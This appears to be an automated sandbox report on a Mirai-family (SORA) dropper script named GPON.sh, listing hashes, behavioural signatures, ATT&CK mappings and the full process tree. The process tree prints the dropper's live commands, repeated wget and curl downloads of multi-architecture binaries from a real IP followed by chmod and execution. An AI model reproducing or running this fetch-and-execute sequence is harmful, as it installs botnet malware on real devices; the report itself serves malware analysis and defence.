Analysis
-
max time kernel
36s -
max time network
150s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
22-02-2025 16:57
Static task
static1
Behavioral task
behavioral1
Sample
GPON.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
GPON.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
GPON.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
GPON.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
GPON.sh
-
Size
1KB
-
MD5
5e6b993735e7a9bcafc44479de9ad361
-
SHA1
646f766fcc739d4e370626ad0cd732955b85bff1
-
SHA256
cbf92e8a0ac875219802f4e5ffb7177afb36d915c8041337883f4fd1e9497d8a
-
SHA512
7e344749f5df14e6f8aa8ddb8f2b38438e886b019afcfa3020a505eb9f660e84741fffad3dc31e031b6245ce205737b1f08efc79bf466e51c6d46fcf3dbcaa35
Malware Config
Extracted
mirai
SORA
Extracted
mirai
SORA
Extracted
mirai
SORA
Signatures
-
Mirai family
-
Contacts a large (206872) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 745 chmod 794 chmod 803 chmod 812 chmod 675 chmod 689 chmod 713 chmod 780 chmod 785 chmod 733 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/SSH 677 GPON.sh /tmp/SSH 691 GPON.sh /tmp/SSH 714 GPON.sh /tmp/SSH 735 GPON.sh /tmp/SSH 746 GPON.sh /tmp/SSH 781 GPON.sh /tmp/SSH 786 GPON.sh /tmp/SSH 795 GPON.sh /tmp/SSH 804 GPON.sh /tmp/SSH 813 GPON.sh -
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH File opened for modification /dev/watchdog SSH File opened for modification /dev/misc/watchdog SSH -
Changes its process name 4 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself pkb5mmbb2gahnj045 786 SSH Changes the process name, possibly in an attempt to hide itself a4a0i3kph20ppc1bi1i 795 SSH Changes the process name, possibly in an attempt to hide itself apgkbocj2a1mjj44dpc 804 SSH Changes the process name, possibly in an attempt to hide itself 0ph13epa11pe44md13e 813 SSH -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 688 cat 680 wget 681 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Hilix.mpsl wget File opened for modification /tmp/Hilix.arm6 curl File opened for modification /tmp/Hilix.arm7 curl File opened for modification /tmp/Hilix.sh4 curl File opened for modification /tmp/Hilix.mpsl curl File opened for modification /tmp/Hilix.arm5 wget File opened for modification /tmp/Hilix.arm5 curl File opened for modification /tmp/Hilix.arm7 wget File opened for modification /tmp/Hilix.ppc wget File opened for modification /tmp/Hilix.m68k wget File opened for modification /tmp/Hilix.x86 curl File opened for modification /tmp/SSH GPON.sh File opened for modification /tmp/Hilix.mips wget File opened for modification /tmp/Hilix.mips curl File opened for modification /tmp/Hilix.arm6 wget File opened for modification /tmp/Hilix.ppc curl File opened for modification /tmp/Hilix.m68k curl File opened for modification /tmp/Hilix.sh4 wget File opened for modification /tmp/Hilix.x86 wget File opened for modification /tmp/Hilix.arm4 curl
Processes
-
/tmp/GPON.sh/tmp/GPON.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:643 -
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.x862⤵
- Writes file to tmp directory
PID:645
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:670
-
-
/bin/catcat Hilix.x862⤵PID:674
-
-
/bin/chmodchmod +x GPON.sh Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:675
-
-
/tmp/SSH./SSH GPON2⤵PID:677
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:680
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:681
-
-
/bin/catcat Hilix.mips2⤵
- System Network Configuration Discovery
PID:688
-
-
/bin/chmodchmod +x GPON.sh Hilix.mips Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:689
-
-
/tmp/SSH./SSH GPON2⤵PID:691
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.mpsl2⤵
- Writes file to tmp directory
PID:693
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:701
-
-
/bin/catcat Hilix.mpsl2⤵PID:712
-
-
/bin/chmodchmod +x GPON.sh Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/SSH./SSH GPON2⤵PID:714
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.arm42⤵PID:716
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:723
-
-
/bin/catcat Hilix.arm42⤵PID:732
-
-
/bin/chmodchmod +x GPON.sh Hilix.arm4 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:733
-
-
/tmp/SSH./SSH GPON2⤵PID:735
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.arm52⤵
- Writes file to tmp directory
PID:736
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/catcat Hilix.arm52⤵PID:744
-
-
/bin/chmodchmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/SSH./SSH GPON2⤵PID:746
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.arm62⤵
- Writes file to tmp directory
PID:747
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:769
-
-
/bin/catcat Hilix.arm62⤵PID:779
-
-
/bin/chmodchmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:780
-
-
/tmp/SSH./SSH GPON2⤵PID:781
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.arm72⤵
- Writes file to tmp directory
PID:782
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/catcat Hilix.arm72⤵PID:784
-
-
/bin/chmodchmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/SSH./SSH GPON2⤵
- Modifies Watchdog functionality
- Changes its process name
PID:786
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.ppc2⤵
- Writes file to tmp directory
PID:789
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/chmodchmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.mips Hilix.mpsl Hilix.ppc Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/SSH./SSH GPON2⤵
- Modifies Watchdog functionality
- Changes its process name
PID:795
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.m68k2⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/chmodchmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.m68k Hilix.mips Hilix.mpsl Hilix.ppc Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/SSH./SSH GPON2⤵
- Modifies Watchdog functionality
- Changes its process name
PID:804
-
-
/usr/bin/wgetwget http://37.221.67.207/bins/Hilix.sh42⤵
- Writes file to tmp directory
PID:807
-
-
/usr/bin/curlcurl -O http://37.221.67.207/bins/Hilix.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:810
-
-
/bin/chmodchmod +x GPON.sh Hilix.arm4 Hilix.arm5 Hilix.arm6 Hilix.arm7 Hilix.m68k Hilix.mips Hilix.mpsl Hilix.ppc Hilix.sh4 Hilix.x86 SSH systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-ImR4Z62⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/SSH./SSH GPON2⤵
- Modifies Watchdog functionality
- Changes its process name
PID:813
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
48KB
MD511863d3338efb145179a0f97dce5b8c1
SHA1f2e14c388fdab6b68d9632190f0cbf6965c955f5
SHA2560621c143e5055a7842daccb78ee3ae12549a089e92a0f350bdade1073b9cce7f
SHA51287e7cc3f4aff9b7fc3e705a4c5225ed2368cf48f4a89a168fbde3ec83cd7580c24c48e6568944d104e895e5b725ecff5056f8e20e823242cb5699bcabe699e08
-
Filesize
71KB
MD5200e03d27fc14205a10f0d5a030475d9
SHA1188c13983b81ed439c8f0cc12039b465ba6616ca
SHA256acd3c8b0b1ca433037786c16fd2445fbf96bc361d95b892504880f96b59c436d
SHA512af4e5976ca65a8d00654e762593a952549cbbb3f70c42540f450a6698b36378c09a2d183692a77233e0c78d92b2774ea7a200babfb5839b30c1cf7dfeafb3c89
-
Filesize
71KB
MD5a23bd973e7ff662a50be1d058902f06c
SHA1d32254694bcf9a61494f3edd1e0d96dd8866af95
SHA2566f4f9d4ee87974712c252118942ab7b2492d016b2655ef0984a8c16aa476dc4e
SHA5125ac13beaa13eaa4d363bc5fd9616c694ce453ae1b458735c642c0bb7f54835a80d2254e6fac48a684e3d3f7d472b1c95adf52b3f568799eedaa6ca8aab9096df
-
Filesize
213B
MD5f87005f796675cc42d01d2c2a0980019
SHA1f86803abb6a20f74faa7d9a5cef4ad4ff35ed7cf
SHA2563da99f8ed6b2499f723f7222634c922c77db0be580762fe1ef49a6933e5dfe7c
SHA5122efd306ad26cdc3d521a203482ab104696fa681663e8268fd8b735e53daac7da3a37087bc3fae814c6e341c805e56aff9a0ebdc9c392546f0d23b916c07a8770
-
Filesize
49KB
MD57dc9ff83da9241b391d19ab5e0c852a2
SHA1990d4884a26640801b7c0798f8b370d90069e6c3
SHA256e27622cb3fa56e1c36aeade1208b57dac065c386de4ebd1723802d373d300a22
SHA512969f54dd3acc3ce702c2ee502044e590c7e8c55b7a9eae52965ef61cb627dbd71e1d083b7e298763a09a83985a2c58d20cf78dcc237586884cc92d613d2aee40
-
Filesize
128KB
MD5e4cfb853d49b335c295f07312a97a0c5
SHA1c547b5df2c22728ce8321eb495597b4cc4920c24
SHA2562d7685d750cb702de3a39d43429fd51b9391f3b70a1724901b464619cb53ea18
SHA512207112452da6f16774817c89e5d47e473396559d03f2885f323fa23cf077d98c6bbbf6a79d3a15f467db8382c56535c3d9befb9386b6d1d7fdf0f3f76efecdae